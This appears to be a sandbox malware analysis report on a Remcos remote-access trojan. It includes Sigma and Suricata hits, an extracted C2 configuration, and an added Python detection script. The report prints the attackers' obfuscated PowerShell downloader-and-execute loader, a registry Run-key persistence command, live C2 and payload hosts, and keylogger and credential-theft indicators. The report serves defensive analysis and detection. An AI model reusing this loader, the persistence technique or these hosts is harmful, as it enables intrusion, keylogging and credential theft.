Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1292, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", ProcessId: 2992, ProcessName: reg.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.21.56.189, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49797
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1276, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", ProcessId: 1292, ProcessName: cmd.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. 
HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin H
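The Sigma hits above fit together into one picture. A bare `msiexec.exe` (no install switch on its command line) is the hollowed host for Remcos and is the process that opens the outbound connections; it spawns cmd.exe, which runs reg.exe to write a REG_EXPAND_SZ Run value whose command is nothing but an environment variable `%Afgrnsningsproblemer%` followed by a read of a second registry value (`HKCU:\Software\hovedparts\`, value `Bagateller`) that holds the real payload. For that to survive a logon the variable has to resolve, presumably from the user's `HKCU\Environment` key, which this report does not show, so check it during response. The further `msiexec.exe /stext "<Temp path>"` children are not msiexec invocations at all: msiexec has no `/stext` switch, it is the NirSoft save-report switch, which is consistent with the WebBrowserPassView Yara hit and the mail-credential signature.

The block below is an added example written for this page, not Joe Sandbox code or any of the Sigma rules' own logic. It runs detection rules for those four patterns over constructed Sysmon-style events (Event ID 1 process create, 3 network connect, 13 registry value set) that mirror the report's process tree, plus two benign controls. Assumptions are marked in the code: the list of msiexec install switches and the set of standard environment variables are starting points to extend for a given fleet, and the network rule only fires for msiexec when the process carries no install switch or talks to a non-web port, because a genuine `msiexec /i <URL>` legitimately downloads packages over HTTP(S).

```python
import re

# Added example, not Joe Sandbox code: detection logic for the persistence and
# process-hollowing pattern in this report, evaluated over Sysmon-style events
# (Event ID 1 process create, 3 network connect, 13 registry value set).

# Variables Windows defines for every user. A Run value that expands any other
# %NAME% takes its command from a variable the attacker planted. (Assumed
# baseline; extend for your environment.)
STANDARD_ENV = {
    "SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "COMSPEC", "PROGRAMFILES",
    "PROGRAMFILES(X86)", "PROGRAMDATA", "ALLUSERSPROFILE", "APPDATA",
    "LOCALAPPDATA", "USERPROFILE", "TEMP", "TMP", "PUBLIC",
}
# Lower-case substrings that mark a Run value as a script rather than a path.
SCRIPT_TOKENS = ("-windowstyle", "gp -path", "hkcu:", "powershell", "mshta", "wscript")
# Switches a genuine msiexec invocation carries (assumed list; extend as needed).
MSIEXEC_SWITCHES = {"/i", "/x", "/a", "/j", "/f", "/p", "/package", "/uninstall", "/update"}
WEB_PORTS = {80, 443}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events: list) -> list:
    """Return (rule, pid, detail) for each event that matches a rule."""
    # Network events carry no command line; take it from the process-create event.
    cmdline = {e["ProcessId"]: e["CommandLine"] for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        pid, img = e["ProcessId"], image_name(e["Image"])
        if e["EventID"] == 1:
            argv = e["CommandLine"].lower().split()
            parent = image_name(e.get("ParentImage", ""))
            # msiexec has no /stext switch; it is the NirSoft save-report switch.
            if img == "msiexec.exe" and "/stext" in argv:
                findings.append(("msiexec_nirsoft_stext", pid, e["CommandLine"]))
            if parent == "msiexec.exe" and img in {"cmd.exe", "powershell.exe", "reg.exe"}:
                findings.append(("msiexec_spawns_shell", pid, e["CommandLine"]))
        elif e["EventID"] == 13 and "\\currentversion\\run\\" in e["TargetObject"].lower():
            data = e["Details"]
            odd_vars = sorted({v for v in re.findall(r"%([^%\s]+)%", data)
                               if v.upper() not in STANDARD_ENV})
            tokens = [t for t in SCRIPT_TOKENS if t in data.lower()]
            if odd_vars or tokens:
                findings.append(("run_key_indirect_script", pid,
                                 f"{e['TargetObject']} vars={odd_vars} tokens={tokens}"))
        elif e["EventID"] == 3 and img == "msiexec.exe":
            switches = MSIEXEC_SWITCHES & set(cmdline.get(pid, "").lower().split())
            port = e["DestinationPort"]
            # Real installs fetch packages over HTTP(S) with /i or similar; a bare
            # msiexec.exe, or any msiexec on a non-web port, is the hollowed host.
            if not switches or port not in WEB_PORTS:
                findings.append(("msiexec_network_without_install", pid,
                                 f"{e['DestinationIp']}:{port} cmdline={cmdline.get(pid, '?')}"))
    return findings


REG_DATA = ("%Afgrnsningsproblemer% -windowstyle 1 "
            "$Predestinationism=(gp -Path 'HKCU:\\Software\\hovedparts\\').Bagateller;"
            "%Afgrnsningsproblemer% ($Predestinationism)")
MSI32 = "C:\\Windows\\SysWOW64\\msiexec.exe"
RUN_KEY = "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\"

# Constructed events mirroring the process tree in this report, plus two benign
# controls (a real msiexec install over HTTPS and an ordinary Run value).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 1276, "Image": MSI32, "CommandLine": f'"{MSI32}"',
     "ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"EventID": 3, "ProcessId": 1276, "Image": MSI32, "DestinationIp": "104.21.56.189", "DestinationPort": 443},
    {"EventID": 3, "ProcessId": 1276, "Image": MSI32, "DestinationIp": "185.236.203.101", "DestinationPort": 51525},
    {"EventID": 1, "ProcessId": 1292, "Image": "C:\\Windows\\SysWOW64\\cmd.exe", "ParentImage": MSI32,
     "CommandLine": '"C:\\Windows\\System32\\cmd.exe" /c REG ADD HKCU\\Software\\Microsoft\\Windows'
                    '\\CurrentVersion\\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "' + REG_DATA + '"'},
    {"EventID": 1, "ProcessId": 2992, "Image": "C:\\Windows\\SysWOW64\\reg.exe",
     "ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
     "CommandLine": 'REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v "Aversi"'
                    ' /t REG_EXPAND_SZ /d "' + REG_DATA + '"'},
    {"EventID": 13, "ProcessId": 2992, "Image": "C:\\Windows\\SysWOW64\\reg.exe",
     "TargetObject": RUN_KEY + "Aversi", "Details": REG_DATA},
    {"EventID": 1, "ProcessId": 6416, "Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": MSI32,
     "CommandLine": 'C:\\Windows\\System32\\msiexec.exe /stext "C:\\Users\\user\\AppData\\Local\\Temp\\qalgwws"'},
    {"EventID": 1, "ProcessId": 4242, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "msiexec.exe /i https://example.invalid/agent.msi /qn"},
    {"EventID": 3, "ProcessId": 4242, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 13, "ProcessId": 777, "Image": "C:\\Windows\\regedit.exe", "TargetObject": RUN_KEY + "OneDrive",
     "Details": '"%LOCALAPPDATA%\\Microsoft\\OneDrive\\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for rule, pid, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:34} pid={pid:<5} {detail[:90]}")
```

On the constructed input the four rules fire on PIDs 2992, 1292, 6416 and 1276 (twice, once per destination) and stay silent on the two controls; the `msiexec_network_without_install` finding for 185.236.203.101:51525 also lines up with the C2 host and port in the extracted Remcos configuration.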

                Stealing of Sensitive Information

                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1276, TargetFilename: C:\ProgramData\remcos\logs.dat
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-17T15:03:17.869346+0200 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49705 | TCP
                2024-10-17T15:03:57.350091+0200 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49909 | TCP

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-17T15:03:46.027589+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49848 | 185.236.203.101 | 51525 | TCP
                2024-10-17T15:03:47.902474+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49859 | 185.236.203.101 | 51525 | TCP

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-17T15:03:47.683447+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49860 | 178.237.33.50 | 80 | TCP


                AV Detection

                Source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Source: Yara matchFile source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability
                Source: unknownHTTPS traffic detected: 194.76.118.27:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.5:49797 version: TLS 1.2
                Source: Binary string: System.Core.pdb4 source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: CallSite.Targetore.pdb;"b source: powershell.exe, 00000005.00000002.2378968135.00000000085A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**Q source: msiexec.exe, 0000000F.00000002.2571532371.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.oeaccount* source: msiexec.exe, 0000000F.00000002.2571532371.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdbh source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_228E10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,8_2_228E6580
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                Networking

                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49848 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49859 -> 185.236.203.101:51525
                Source: Malware configuration extractorURLs: pelele.duckdns.org
                Source: unknownDNS query: name: pelele.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.5:49848 -> 185.236.203.101:51525
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 185.236.203.101 185.236.203.101
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49860 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49705
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49909
                Source: global trafficHTTP traffic detected: GET /Hovedvrket.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: miottoezanella.comConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Hovedvrket.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: miottoezanella.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /nwnNBPSeuTV8.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exe, 00000008.00000002.4525829481.00000000228B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
                Source: msiexec.exe, 0000000E.00000003.2576378628.0000000002D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000E.00000003.2576378628.0000000002D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
